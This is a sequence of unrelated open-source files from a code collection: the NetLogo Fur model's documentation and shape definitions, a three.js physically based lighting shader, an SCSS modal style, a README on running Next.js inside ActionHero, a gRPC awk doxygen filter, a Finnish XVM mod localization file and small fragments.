If you find a combination of slider and switch values that consistently give you the fur patterns of a favorite animal, you could create a button, for instance "Zebra," that sets the sliders to those values. That way, if you make several of these, you can go on a virtual safari tour by moving between your favorite animals. One such combination that you could set in a single button could be: INNER-RADIUS-X 3, INNER-RADIUS-Y 3, OUTER-RADIUS-X 6, OUTER-RADIUS-Y 6, INITIAL-DENSITY 50%, RATIO 0.35.
You could call this, perhaps, Fish.
How about adding more colors? What could be the logic here? If you introduced, say, red, you would have to decide on specific conditions under which that color would appear. Also, you'd have to decide how that color influences other cells.
## RELATED MODELS
Voting, in the Social Science section, is based on simpler rules but generates patterns that are similar in some respects.
## CREDITS AND REFERENCES
The mechanism of "diffusion-driven instability" was first proposed by Alan Turing in 1952. B.N. Nagorcka first proposed applying it to hair and fur. The particular variant presented in this model was proposed by David Young.
In building this model, we used information on this web site: http://users.math.yale.edu/public_html/People/frame/Fractals/Panorama/Biology/Leopard/Leopard.html
Research published in Nature Genetics (Economou et al, 2012) appears to confirm the mechanisms the model proposes.
http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3303118/
A news article in IO9 by Alasdair Wilkins describing the research can be found here.
http://io9.gizmodo.com/5886406/scientists-confirm-alan-turings-50-year-old-theory-for-why-tigers-have-stripes
Here is a quote from the Wilkins article:
>Turing's idea was that biological patterns --- such as a tiger's stripes or a
>leopard's spots - are formed by the interactions of a pair of morphogens, which
>are the signaling molecules that govern tissue development. The particular pair
>that Turing proposed was an activator and an inhibitor. Turing proposed that the
>activator would form something like a tiger's stripe, but then interaction with
>the inhibitor would shut down its expression, creating a blank space. Then the
>process would reverse, and the next stripe would form. The interaction of these
>two morphogens would combine to create the full stripe pattern.
>
>This hypothesis has remained mostly just speculation until now, as researchers
>at King's College London have now tested the idea in the mouths of mice. The
>roofs of mice's mouths contain regularly spaced ridges, and the researchers
>discovered the precise two morphogens that were working as activator and
>inhibitor to create the pattern, just as Turing suggested. What's more, when the
>researchers tampered with one morphogen or the other to increase or decrease
>their activity,the pattern of the ridges changed just as Turing's initial
>equations predicted they would. Researcher Dr. Jeremy Green adds:
>
>"Regularly spaced structures, from vertebrae and hair follicles to the stripes on
>a tiger or zebrafish, are a fundamental motif in biology. There are several
>theories about how patterns in nature are formed, but until now there was only
>circumstantial evidence for Turing's mechanism. Our study provides the first
>experimental identification of an activator-inhibitor system at work in the
>generation of stripes – in this case, in the ridges of the mouth palate.
>Although important in feeling and tasting food, ridges in the mouth are not of
>great medical significance. However, they have proven extremely valuable here in
>validating an old theory of the activator-inhibitor model first put forward by
>Alan Turing in the 50s."
Other new research published in the Journal of Experimental Biology (Egri et al, 2011) proposes an evolutionary explanation for the advantage conferred by stripes. http://jeb.biologists.org/content/215/5/736.abstract
Thanks to Seth Tisue and Dor Abrahamson for their work on this model.
## HOW TO CITE
If you mention this model or the NetLogo software in a publication, we ask that you include the citations below.
For the model itself:
* Wilensky, U. (2003). NetLogo Fur model. http://ccl.northwestern.edu/netlogo/models/Fur. Center for Connected Learning and Computer-Based Modeling, Northwestern University, Evanston, IL.
Please cite the NetLogo software as:
* Wilensky, U. (1999). NetLogo. http://ccl.northwestern.edu/netlogo/. Center for Connected Learning and Computer-Based Modeling, Northwestern University, Evanston, IL.
## COPYRIGHT AND LICENSE
Copyright 2003 Uri Wilensky.

This work is licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License. To view a copy of this license, visit https://creativecommons.org/licenses/by-nc-sa/3.0/ or send a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
Commercial licenses are also available. To inquire about commercial licenses, please contact Uri Wilensky at uri@northwestern.edu.
This model was created as part of the projects: PARTICIPATORY SIMULATIONS: NETWORK-BASED DESIGN FOR SYSTEMS LEARNING IN CLASSROOMS and/or INTEGRATED SIMULATION AND MODELING ENVIRONMENT. The project gratefully acknowledges the support of the National Science Foundation (REPP & ROLE programs) -- grant numbers REC #9814682 and REC-0126227.
<!-- 2003 -->
@#$#@#$#@
default
true
0
Polygon -7500403 true true 150 5 40 250 150 205 260 250
airplane
true
0
Polygon -7500403 true true 150 0 135 15 120 60 120 105 15 165 15 195 120 180 135 240 105 270 120 285 150 270 180 285 210 270 165 240 180 180 285 195 285 165 180 105 180 60 165 15
arrow
true
0
Polygon -7500403 true true 150 0 0 150 105 150 105 293 195 293 195 150 300 150
box
false
0
Polygon -7500403 true true 150 285 285 225 285 75 150 135
Polygon -7500403 true true 150 135 15 75 150 15 285 75
Polygon -7500403 true true 15 75 15 225 150 285 150 135
Line -16777216 false 150 285 150 135
Line -16777216 false 150 135 15 75
Line -16777216 false 150 135 285 75
bug
true
0
Circle -7500403 true true 96 182 108
Circle -7500403 true true 110 127 80
Circle -7500403 true true 110 75 80
Line -7500403 true 150 100 80 30
Line -7500403 true 150 100 220 30
butterfly
true
0
Polygon -7500403 true true 150 165 209 199 225 225 225 255 195 270 165 255 150 240
Polygon -7500403 true true 150 165 89 198 75 225 75 255 105 270 135 255 150 240
Polygon -7500403 true true 139 148 100 105 55 90 25 90 10 105 10 135 25 180 40 195 85 194 139 163
Polygon -7500403 true true 162 150 200 105 245 90 275 90 290 105 290 135 275 180 260 195 215 195 162 165
Polygon -16777216 true false 150 255 135 225 120 150 135 120 150 105 165 120 180 150 165 225
Circle -16777216 true false 135 90 30
Line -16777216 false 150 105 195 60
Line -16777216 false 150 105 105 60
car
false
0
Polygon -7500403 true true 300 180 279 164 261 144 240 135 226 132 213 106 203 84 185 63 159 50 135 50 75 60 0 150 0 165 0 225 300 225 300 180
Circle -16777216 true false 180 180 90
Circle -16777216 true false 30 180 90
Polygon -16777216 true false 162 80 132 78 134 135 209 135 194 105 189 96 180 89
Circle -7500403 true true 47 195 58
Circle -7500403 true true 195 195 58
circle
false
0
Circle -7500403 true true 0 0 300
circle 2
false
0
Circle -7500403 true true 0 0 300
Circle -16777216 true false 30 30 240
cow
false
0
Polygon -7500403 true true 200 193 197 249 179 249 177 196 166 187 140 189 93 191 78 179 72 211 49 209 48 181 37 149 25 120 25 89 45 72 103 84 179 75 198 76 252 64 272 81 293 103 285 121 255 121 242 118 224 167
Polygon -7500403 true true 73 210 86 251 62 249 48 208
Polygon -7500403 true true 25 114 16 195 9 204 23 213 25 200 39 123
cylinder
false
0
Circle -7500403 true true 0 0 300
dot
false
0
Circle -7500403 true true 90 90 120
face happy
false
0
Circle -7500403 true true 8 8 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Polygon -16777216 true false 150 255 90 239 62 213 47 191 67 179 90 203 109 218 150 225 192 218 210 203 227 181 251 194 236 217 212 240
face neutral
false
0
Circle -7500403 true true 8 7 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Rectangle -16777216 true false 60 195 240 225
face sad
false
0
Circle -7500403 true true 8 8 285
Circle -16777216 true false 60 75 60
Circle -16777216 true false 180 75 60
Polygon -16777216 true false 150 168 90 184 62 210 47 232 67 244 90 220 109 205 150 198 192 205 210 220 227 242 251 229 236 206 212 183
fish
false
0
Polygon -1 true false 44 131 21 87 15 86 0 120 15 150 0 180 13 214 20 212 45 166
Polygon -1 true false 135 195 119 235 95 218 76 210 46 204 60 165
Polygon -1 true false 75 45 83 77 71 103 86 114 166 78 135 60
Polygon -7500403 true true 30 136 151 77 226 81 280 119 292 146 292 160 287 170 270 195 195 210 151 212 30 166
Circle -16777216 true false 215 106 30
flag
false
0
Rectangle -7500403 true true 60 15 75 300
Polygon -7500403 true true 90 150 270 90 90 30
Line -7500403 true 75 135 90 135
Line -7500403 true 75 45 90 45
flower
false
0
Polygon -10899396 true false 135 120 165 165 180 210 180 240 150 300 165 300 195 240 195 195 165 135
Circle -7500403 true true 85 132 38
Circle -7500403 true true 130 147 38
Circle -7500403 true true 192 85 38
Circle -7500403 true true 85 40 38
Circle -7500403 true true 177 40 38
Circle -7500403 true true 177 132 38
Circle -7500403 true true 70 85 38
Circle -7500403 true true 130 25 38
Circle -7500403 true true 96 51 108
Circle -16777216 true false 113 68 74
Polygon -10899396 true false 189 233 219 188 249 173 279 188 234 218
Polygon -10899396 true false 180 255 150 210 105 210 75 240 135 240
house
false
0
Rectangle -7500403 true true 45 120 255 285
Rectangle -16777216 true false 120 210 180 285
Polygon -7500403 true true 15 120 150 15 285 120
Line -16777216 false 30 120 270 120
leaf
false
0
Polygon -7500403 true true 150 210 135 195 120 210 60 210 30 195 60 180 60 165 15 135 30 120 15 105 40 104 45 90 60 90 90 105 105 120 120 120 105 60 120 60 135 30 150 15 165 30 180 60 195 60 180 120 195 120 210 105 240 90 255 90 263 104 285 105 270 120 285 135 240 165 240 180 270 195 240 210 180 210 165 195
Polygon -7500403 true true 135 195 135 240 120 255 105 255 105 285 135 285 165 240 165 195
line
true
0
Line -7500403 true 150 0 150 300
line half
true
0
Line -7500403 true 150 0 150 150
pentagon
false
0
Polygon -7500403 true true 150 15 15 120 60 285 240 285 285 120
person
false
0
Circle -7500403 true true 110 5 80
Polygon -7500403 true true 105 90 120 195 90 285 105 300 135 300 150 225 165 300 195 300 210 285 180 195 195 90
Rectangle -7500403 true true 127 79 172 94
Polygon -7500403 true true 195 90 240 150 225 180 165 105
Polygon -7500403 true true 105 90 60 150 75 180 135 105
plant
false
0
Rectangle -7500403 true true 135 90 165 300
Polygon -7500403 true true 135 255 90 210 45 195 75 255 135 285
Polygon -7500403 true true 165 255 210 210 255 195 225 255 165 285
Polygon -7500403 true true 135 180 90 135 45 120 75 180 135 210
Polygon -7500403 true true 165 180 165 210 225 180 255 120 210 135
Polygon -7500403 true true 135 105 90 60 45 45 75 105 135 135
Polygon -7500403 true true 165 105 165 135 225 105 255 45 210 60
Polygon -7500403 true true 135 90 120 45 150 15 180 45 165 90
square
false
0
Rectangle -7500403 true true 30 30 270 270
square 2
false
0
Rectangle -7500403 true true 30 30 270 270
Rectangle -16777216 true false 60 60 240 240
star
false
0
Polygon -7500403 true true 151 1 185 108 298 108 207 175 242 282 151 216 59 282 94 175 3 108 116 108
target
false
0
Circle -7500403 true true 0 0 300
Circle -16777216 true false 30 30 240
Circle -7500403 true true 60 60 180
Circle -16777216 true false 90 90 120
Circle -7500403 true true 120 120 60
tree
false
0
Circle -7500403 true true 118 3 94
Rectangle -6459832 true false 120 195 180 300
Circle -7500403 true true 65 21 108
Circle -7500403 true true 116 41 127
Circle -7500403 true true 45 90 120
Circle -7500403 true true 104 74 152
triangle
false
0
Polygon -7500403 true true 150 30 15 255 285 255
triangle 2
false
0
Polygon -7500403 true true 150 30 15 255 285 255
Polygon -16777216 true false 151 99 225 223 75 224
truck
false
0
Rectangle -7500403 true true 4 45 195 187
Polygon -7500403 true true 296 193 296 150 259 134 244 104 208 104 207 194
Rectangle -1 true false 195 60 195 105
Polygon -16777216 true false 238 112 252 141 219 141 218 112
Circle -16777216 true false 234 174 42
Rectangle -7500403 true true 181 185 214 194
Circle -16777216 true false 144 174 42
Circle -16777216 true false 24 174 42
Circle -7500403 false true 24 174 42
Circle -7500403 false true 144 174 42
Circle -7500403 false true 234 174 42
turtle
true
0
Polygon -10899396 true false 215 204 240 233 246 254 228 266 215 252 193 210
Polygon -10899396 true false 195 90 225 75 245 75 260 89 269 108 261 124 240 105 225 105 210 105
Polygon -10899396 true false 105 90 75 75 55 75 40 89 31 108 39 124 60 105 75 105 90 105
Polygon -10899396 true false 132 85 134 64 107 51 108 17 150 2 192 18 192 52 169 65 172 87
Polygon -10899396 true false 85 204 60 233 54 254 72 266 85 252 107 210
Polygon -7500403 true true 119 75 179 75 209 101 224 135 220 225 175 261 128 261 81 224 74 135 88 99
wheel
false
0
Circle -7500403 true true 3 3 294
Circle -16777216 true false 30 30 240
Line -7500403 true 150 285 150 15
Line -7500403 true 15 150 285 150
Circle -7500403 true true 120 120 60
Line -7500403 true 216 40 79 269
Line -7500403 true 40 84 269 221
Line -7500403 true 40 216 269 79
Line -7500403 true 84 40 221 269
x
false
0
Polygon -7500403 true true 270 75 225 30 30 225 75 270
Polygon -7500403 true true 30 75 75 30 270 225 225 270
@#$#@#$#@
NetLogo 6.0.2
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
@#$#@#$#@
default
0.0
-0.2 0 0.0 1.0
0.0 1 1.0 0.0
0.2 0 0.0 1.0
link direction
true
0
Line -7500403 true 150 150 90 180
Line -7500403 true 150 150 210 180
@#$#@#$#@
0
@#$#@#$#@
| NetLogo | 5 | fsancho/IA | 07. Complexity/Fur.nlogo | [
"MIT"
] |
import { ShaderNode,
add, addTo, sub, mul, div, saturate, dot, pow, pow2, exp2, normalize, max, sqrt, negate,
cond, greaterThan, and,
transformedNormalView, positionViewDirection,
diffuseColor, specularColor, roughness,
PI, RECIPROCAL_PI, EPSILON
} from '../ShaderNode.js';
export const F_Schlick = new ShaderNode( ( inputs ) => {
const { f0, f90, dotVH } = inputs;
// Original approximation by Christophe Schlick '94
// float fresnel = pow( 1.0 - dotVH, 5.0 );
// Optimized variant (presented by Epic at SIGGRAPH '13)
// https://cdn2.unrealengine.com/Resources/files/2013SiggraphPresentationsNotes-26915738.pdf
const fresnel = exp2( mul( sub( mul( - 5.55473, dotVH ), 6.98316 ), dotVH ) );
return add( mul( f0, sub( 1.0, fresnel ) ), mul( f90, fresnel ) );
} ); // validated
export const BRDF_Lambert = new ShaderNode( ( inputs ) => {
return mul( RECIPROCAL_PI, inputs.diffuseColor ); // punctual light
} ); // validated
export const getDistanceAttenuation = new ShaderNode( ( inputs ) => {
const { lightDistance, cutoffDistance, decayExponent } = inputs;
return cond(
and( greaterThan( cutoffDistance, 0 ), greaterThan( decayExponent, 0 ) ),
pow( saturate( add( div( negate( lightDistance ), cutoffDistance ), 1.0 ) ), decayExponent ),
1.0
);
} ); // validated
//
// STANDARD
//
// Moving Frostbite to Physically Based Rendering 3.0 - page 12, listing 2
// https://seblagarde.files.wordpress.com/2015/07/course_notes_moving_frostbite_to_pbr_v32.pdf
export const V_GGX_SmithCorrelated = new ShaderNode( ( inputs ) => {
const { alpha, dotNL, dotNV } = inputs;
const a2 = pow2( alpha );
const gv = mul( dotNL, sqrt( add( a2, mul( sub( 1.0, a2 ), pow2( dotNV ) ) ) ) );
const gl = mul( dotNV, sqrt( add( a2, mul( sub( 1.0, a2 ), pow2( dotNL ) ) ) ) );
return div( 0.5, max( add( gv, gl ), EPSILON ) );
} ); // validated
// Microfacet Models for Refraction through Rough Surfaces - equation (33)
// http://graphicrants.blogspot.com/2013/08/specular-brdf-reference.html
// alpha is "roughness squared" in Disney’s reparameterization
export const D_GGX = new ShaderNode( ( inputs ) => {
const { alpha, dotNH } = inputs;
const a2 = pow2( alpha );
const denom = add( mul( pow2( dotNH ), sub( a2, 1.0 ) ), 1.0 ); // avoid alpha = 0 with dotNH = 1
return mul( RECIPROCAL_PI, div( a2, pow2( denom ) ) );
} ); // validated
// GGX Distribution, Schlick Fresnel, GGX_SmithCorrelated Visibility
export const BRDF_GGX = new ShaderNode( ( inputs ) => {
const { lightDirection, f0, f90, roughness } = inputs;
const alpha = pow2( roughness ); // UE4's roughness
const halfDir = normalize( add( lightDirection, positionViewDirection ) );
const dotNL = saturate( dot( transformedNormalView, lightDirection ) );
const dotNV = saturate( dot( transformedNormalView, positionViewDirection ) );
const dotNH = saturate( dot( transformedNormalView, halfDir ) );
const dotVH = saturate( dot( positionViewDirection, halfDir ) );
const F = F_Schlick( { f0, f90, dotVH } );
const V = V_GGX_SmithCorrelated( { alpha, dotNL, dotNV } );
const D = D_GGX( { alpha, dotNH } );
return mul( F, mul( V, D ) );
} ); // validated
export const RE_Direct_Physical = new ShaderNode( ( inputs ) => {
const { lightDirection, lightColor, directDiffuse, directSpecular } = inputs;
const dotNL = saturate( dot( transformedNormalView, lightDirection ) );
let irradiance = mul( dotNL, lightColor );
irradiance = mul( irradiance, PI ); // punctual light
addTo( directDiffuse, mul( irradiance, BRDF_Lambert( { diffuseColor } ) ) );
addTo( directSpecular, mul( irradiance, BRDF_GGX( { lightDirection, f0: specularColor, f90: 1, roughness } ) ) );
} );
export const PhysicalLightingModel = new ShaderNode( ( inputs/*, builder*/ ) => {
// PHYSICALLY_CORRECT_LIGHTS <-> builder.renderer.physicallyCorrectLights === true
RE_Direct_Physical( inputs );
} );
| JavaScript | 5 | KostaMalsev/three.js | examples/jsm/renderers/nodes/functions/BSDFs.js | [
"MIT"
] |
.dialog-ux
{
position: fixed;
z-index: 9999;
top: 0;
right: 0;
bottom: 0;
left: 0;
.backdrop-ux
{
position: fixed;
top: 0;
right: 0;
bottom: 0;
left: 0;
background: rgba($dialog-ux-backdrop-background-color,.8);
}
.modal-ux
{
position: absolute;
z-index: 9999;
top: 50%;
left: 50%;
width: 100%;
min-width: 300px;
max-width: 650px;
transform: translate(-50%,-50%);
border: 1px solid $dialog-ux-modal-border-color;
border-radius: 4px;
background: $dialog-ux-modal-background-color;
box-shadow: 0 10px 30px 0 rgba($dialog-ux-modal-box-shadow-color,.20);
}
.modal-ux-content
{
overflow-y: auto;
max-height: 540px;
padding: 20px;
p
{
font-size: 12px;
margin: 0 0 5px 0;
color: $dialog-ux-modal-content-font-color;
@include text_body();
}
h4
{
font-size: 18px;
font-weight: 600;
margin: 15px 0 0 0;
@include text_headline();
}
}
.modal-ux-header
{
display: flex;
padding: 12px 0;
border-bottom: 1px solid $dialog-ux-modal-header-border-bottom-color;
align-items: center;
.close-modal
{
padding: 0 10px;
border: none;
background: none;
appearance: none;
}
h3
{
font-size: 20px;
font-weight: 600;
margin: 0;
padding: 0 20px;
flex: 1;
@include text_headline();
}
}
}
| SCSS | 4 | ilozano2/swagger-ui | src/style/_modal.scss | [
"Apache-2.0"
] |
# Running Next.JS and React /inside/ of ActionHero
This server will render dynamic next.js/react pages on some routes, and normal ActionHero API requests on others.<br>
This configuration works with both Next and ActionHero hot reloading of code.
A more detailed example showcasing how to use fetch and web sockets to interact with your API can be found here: https://github.com/actionhero/next-in-actionhero
## How to use
Execute [`create-next-app`](https://github.com/vercel/next.js/tree/canary/packages/create-next-app) with [npm](https://docs.npmjs.com/cli/init) or [Yarn](https://yarnpkg.com/lang/en/docs/cli/create/) to bootstrap the example:
```bash
npx create-next-app --example custom-server-actionhero custom-server-actionhero-app
# or
yarn create next-app --example custom-server-actionhero custom-server-actionhero-app
```
## How does this work?
1. Create an initializer to load next.js and create a handler that can extract the normal node `req` and `res` from the connection
```js
// initializers/next.js
const { Initializer, api } = require('actionhero')
const next = require('next')
module.exports = class NextInitializer extends Initializer {
constructor() {
super()
this.name = 'next'
}
async initialize() {
api.next = {
render: async (connection) => {
if (connection.type !== 'web') {
throw new Error('Connections for NEXT apps must be of type "web"')
}
const req = connection.rawConnection.req
const res = connection.rawConnection.res
return api.next.handle(req, res)
},
}
api.next.dev = api.env === 'development'
if (api.next.dev) {
api.log('Running next in development mode...')
}
api.next.app = next({ dev: api.next.dev })
api.next.handle = api.next.app.getRequestHandler()
await api.next.app.prepare()
}
async stop() {
await api.next.app.close()
}
}
```
2. Create an action which will run the above `api.next.render(connection)`. Note that we will not be relying on ActionHero to respond to the client's request in this case, and leave that up to next (via: `data.toRender = false`)
```js
// actions/next.js
const { Action, api } = require('actionhero')
module.exports = class CreateChatRoom extends Action {
constructor() {
super()
this.name = 'render'
this.description = 'I render the next.js react website'
}
async run(data) {
data.toRender = false
return api.next.render(data.connection)
}
}
```
3. Tell ActionHero to use the api rather than the file server as the top-level route in `api.config.servers.web.rootEndpointType = 'api'`. This will allows "/" to listen to API requests. Also update `api.config.general.paths.public = [ path.join(__dirname, '/../static') ]`. In this configuration, the next 'static' renderer will take priority over the ActionHero 'public file' api. Note that any static assets (CSS, fonts, etc) will need to be in "./static" rather than "./public".
Note that this is where the websocket server, if you enable it, will place the `ActionheroWebsocketClient` library.<br>
4. Configure a wild-card route at the lowest priority of your GET handler to catch all web requests that aren't caught by other actions:
```js
// config/routes.js
exports['default'] = {
routes: (api) => {
return {
get: [
{ path: '/time', action: 'time' },
{ path: '/', matchTrailingPathParts: true, action: 'render' },
],
}
},
}
```
| Markdown | 5 | blomqma/next.js | examples/custom-server-actionhero/README.md | [
"MIT"
] |
# Copyright 2020 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# the spaces in the parameter list are necessary to separate out local variables
function sed_gensub(regexp, replacement, how, target, cmd_, ret_) { # arguments and local variables
if (!target) {
target = $0
}
gsub(/'/, "'\"'\"'", target);
gsub(/\\\\/, "\\", regexp);
cmd_ = "printf '" target "' | sed -nE 's/" regexp "/" replacement "/" tolower(how) "p'";
if (cmd_ | getline ret_ != 1) {
close(cmd_);
error = "ERROR: running command: " cmd_ ", ret_: " ret_;
exit;
}
close(cmd_);
return ret_;
}
BEGIN {
namespace = "Grpc";
className = "";
classDocComment = "";
delete methodNames; # i => methodName
delete methodArgs; # methodName => concatenatedArgsStr
delete methodDocs; # methodName => methodDocCommentStr
delete methodStatics; # methodName => 1 if static
methodsCount = 0;
delete constantNames; # i => constantName
delete constantDocs; # constantName => constantDocCommentStr
constantsCount = 0;
# * class className
classLineRegex = "^ \\* class ([^ \t]+)$";
# @param type name [= default]
paramLineRegex = "^.*@param[ \t]+[^ \t]+[ \t]+(\\$[^ \t]+([ \t]+=[ \t]+[^ \t]+)?)[ \t]+.*$";
# PHP_METHOD(class, function)
phpMethodLineRegex = "^PHP_METHOD\\(([^ \t]+),[ \t]*([^ \t]+)\\).*$";
# PHP_ME(class, function, arginfo, flags)
phpMeLineRegex = "^[ \t]*PHP_ME\\(([^ \t]+),[ \t]*([^ \t]+),.*$";
# REGISTER_LONG_CONSTANT("namespace\\constant", grpcConstant, ..)
phpConstantLineRegs = "^[ \t]*REGISTER_LONG_CONSTANT\\(\"Grpc\\\\\\\\([^ \t]+)\",.*$";
error = "";
# extension testing methods
hideMethods["Channel::getChannelInfo"] = 1;
hideMethods["Channel::cleanPersistentList"] = 1;
hideMethods["Channel::getPersistentList"] = 1;
}
# '/**' document comment start
/^[ \t]*\/\*\*/ {
inDocComment = 1;
docComment = "";
delete args;
argsCount = 0;
}
# collect document comment
inDocComment==1 {
docComment = docComment"\n"$0
}
# class document, must match ' * class <clasName>'
inDocComment==1 && $0 ~ classLineRegex {
className = sed_gensub(classLineRegex, "\\1", "g");
}
# end of class document
inDocComment==1 && /\*\// && className && classDocComment == "" {
classDocComment = docComment;
docComment = "";
}
# param line
inDocComment==1 && $0 ~ paramLineRegex {
arg = sed_gensub(paramLineRegex, "\\1", "g");
args[argsCount++]=arg;
}
# '*/' document comment end
inDocComment==1 && /\*\// {
inDocComment = 0;
}
# PHP_METHOD
$0 ~ phpMethodLineRegex {
class = sed_gensub(phpMethodLineRegex, "\\1", "g");
if (class != className) {
error = "ERROR: Missing or mismatch class names, in class comment block: " \
className ", in PHP_METHOD: " class;
exit;
};
method = sed_gensub(phpMethodLineRegex, "\\2", "g");
methodNames[methodsCount++] = method;
methodDocs[method] = docComment;
# concat args
if (argsCount > 0) {
methodArgs[method] = args[0];
for (i = 1; i < argsCount; i++) {
methodArgs[method] = methodArgs[method] ", " args[i];
}
}
docComment = "";
}
# PHP_ME(class, function,...
$0 ~ phpMeLineRegex {
inPhpMe = 1;
class = sed_gensub(phpMeLineRegex, "\\1", "g");
if (class != className) {
error = "ERROR: Missing or mismatch class names, in class comment block: " \
className ", in PHP_ME: " class;
exit;
};
method = sed_gensub(phpMeLineRegex, "\\2", "g");
}
# ZEND_ACC_STATIC
inPhpMe && /ZEND_ACC_STATIC/ {
methodStatics[method] = 1;
}
# closing bracet of PHP_ME(...)
iinPhpMe && /\)$/ {
inPhpMe = 0;
}
# REGISTER_LONG_CONSTANT(constant, ...
$0 ~ phpConstantLineRegs {
inPhpConstant = 1;
constant = sed_gensub(phpConstantLineRegs, "\\1", "g");
constantNames[constantsCount++] = constant;
constantDocs[constant] = docComment;
}
# closing bracet of REGISTER_LONG_CONSTANT(...)
inPhpConstant && /\)[ \t]*;[ \t]*$/ {
inPhpConstant = 0;
docComment = "";
}
END {
if (error) {
print error > "/dev/stderr";
exit 1;
}
print "<?php\n"
print "namespace " namespace "{";
if (className != "") {
print classDocComment
print "class " className " {";
for (i = 0; i < methodsCount; i++) {
m = methodNames[i];
if (hideMethods[className"::"m]) continue;
print methodDocs[m];
printf "public"
if (methodStatics[m]) printf " static"
printf " function " m "("
printf methodArgs[m];
print ") {}";
}
print "\n}";
}
for (i = 0; i < constantsCount; i++) {
print constantDocs[constantNames[i]];
print "const " constantNames[i] " = 0;";
}
print "\n}";
}
| Awk | 4 | arghyadip01/grpc | src/php/bin/php_extension_doxygen_filter.awk | [
"Apache-2.0"
] |
{
"locale": {
"XVM_translator": "Mikael Palokangas, Seula, Taifuuni and Tuomas Rantalainen",
"Initialization": "Alustus",
"New version available": "Uusi versio on saatavilla",
"Chance error": "Todennäköisyyden epävarmuus",
"Chance to win": "Voittotodennäköisyys",
"chanceLive": "Live",
"chanceBattleTier": "T",
"attack": "osuma",
"fire": "tulipalo",
"ramming": "törmäys",
"world_collision": "putoaminen",
"Hits": "Osumat",
"Total": "Yhteensä",
"Last": "Viimeisin",
"hpLeftTitle": "Jäljellä olevat kestopisteet:",
"enemyBaseCapture": "Omat valtaavat tukikohtaa!",
"enemyBaseCaptured": "Omat valtasivat tukikohdan!!",
"allyBaseCapture": "Viholliset valtaavat tukikohtaanne!",
"allyBaseCaptured": "Viholliset valtasivat tukikohtanne!",
"Timeleft": "Aikaa jäljellä",
"Capturers": "Valtaajia",
"Hit percent": "Osumaprosentti",
"Damage (assisted / own)": "Vahinko (avustettu / aiheutettu)",
"Friend": "Liittolainen",
"Ignored": "Sivuutettu",
"unknown": "ei tietoa",
"Fights": "Taistelut",
"Wins": "Voitot",
"Data was updated at": "Tiedot päivitetty",
"Load statistics": "Lataa tilastot",
"General stats": "Yleiset tilastot",
"Summary": "Yhteenveto",
"Avg level": "Keskim. taso",
"WN6": "WN6",
"WN8": "WN8",
"EFF": "EFF",
"updated": "päivitetty",
" to ": " to ",
"avg": "keskim.",
"top": "ylin",
"draws": "tasapelit",
"Maximum damage": "Vahinkoennätys",
"Specific damage (Avg dmg / HP)": "Suhteellinen vahinko (Keskim. vahinko / KP)",
"Capture points": "Valtauspisteet",
"Defence points": "Puolustuspisteet",
"Filter": "Suodatin",
"Extra data (WoT 0.8.8+)": "Lisätiedot (WOT 0.8.8+)",
"Average battle time": "Keskitaisteluaika",
"Average battle time per day": "Keskitaisteluaika päivässä",
"Battles after 0.8.8": "Taistelut 0.8.8 jälkeen",
"Average experience": "Keskikokemus",
"Average experience without premium": "Keskikokemus ilman premiumia",
"Average distance driven per battle": "Keskiajomatka taistelussa",
"Average woodcuts per battle": "Keskim. kaadettuja puita taistelussa",
"Average damage assisted": "Keskiavustusvahinko",
" by tracking": " seuranneena",
" by spotting": " havainneena",
"Average HE shells fired (splash)": "Keskim. HE ammuksia ammuttu (sirpale)",
"Average HE shells received (splash)": "Keskim. HE ammuksia saatu (sirpale)",
"Average penetrations per battle": "Keskiläpäisyt taistelussa",
"Average hits received": "Osumia saatu keskimäärin",
"Average penetrations received": "Läpäisyjä vastaanotettu keskimäärin",
"Average ricochets received": "Kimmotettu keskimäärin",
"PutOwnCrew": "Aseta oma miehistö",
"PutBestCrew": "Aseta paras miehistö",
"PutClassCrew": "Aseta saman luokan miehistö",
"Vehicle": "Ajoneuvo",
"Battle tiers": "Taistelutasot",
"Type": "Tyyppi",
"Nation": "Kansallisuus",
"ussr": "Neuvostoliitto",
"germany": "Saksa",
"usa": "USA",
"france": "Ranska",
"uk": "Britannia",
"china": "Kiina",
"japan": "Japani",
"HT": "HT",
"MT": "MT",
"LT": "LT",
"TD": "TD",
"SPG": "SPG",
"blownUp": "Räjähti!",
"token/network_error": "Verkkovirhe. Ei yhteyttä XVM tilastoihin, yritä uudelleen myöhemmin.",
"token/bad_token": "Virhe lukuoikeudessa XVM tilastoihin,
{{l10n:token/notify_xvm_site}}",
"token/blocked": "Tila: <font color='#FF0000'>Estetty</font><br>{{l10n:token/notify_xvm_site}}",
"token/inactive": "Tila: <font color='#FFFF00'>Pois päältä</font><br>{{l10n:token/notify_xvm_site}}",
"token/active": "Tila: <font color='#00FF00'>Päällä</font>",
"token/days_left": "Päiviä jäljellä:<tab/><font color='#eeeeee'>{0}</font>",
"token/hours_left": "Tunteja jäljellä:<tab/><font color='#ffff00'>{0}</font>",
"token/cnt": "Kysely laskuri:<tab/><font color='#eeeeee'>{0}</font>",
"token/unknown_status": "Tunnistamaton tila",
"token/notify_xvm_site": "<font color='#EEEEEE'>Ohjeet kirjautumiseen,
Avaa linkki</font> <a href='#XVM_SITE#'>XVM site</a>. <font color='#FF0000'>Kirjaudu ulos pelistä.</font,
<font color='#EEEEEE'>Vaihda avatun sivuston kieli englanniksi. Kirjautuessasi 'sing-in' valitse Eu-serveri. Kirjauduttuasi valitse 'activate', tai 'Prolong'. Voit jatkaa pelaamista. Useammalla tietokoneella valitse 'add PC'.</font>"
}
}
| XC | 4 | smola/language-dataset | data/github.com/Omegaice/WOTTankRanges/90067c21f69ee59e45e6f0ae48c02f1d3d0825b3/xvm/xvm/l10n/fi.xc | [
"MIT"
] |
Rem
Reserved for future expansions.
End Rem
| BlitzMax | 0 | jabdoa2/blitzmax | mod/brl.mod/blitz.mod/doc/delete.bmx | [
"Zlib"
] |
{
"Version" : 0.2,
"ModuleName" : "Chess",
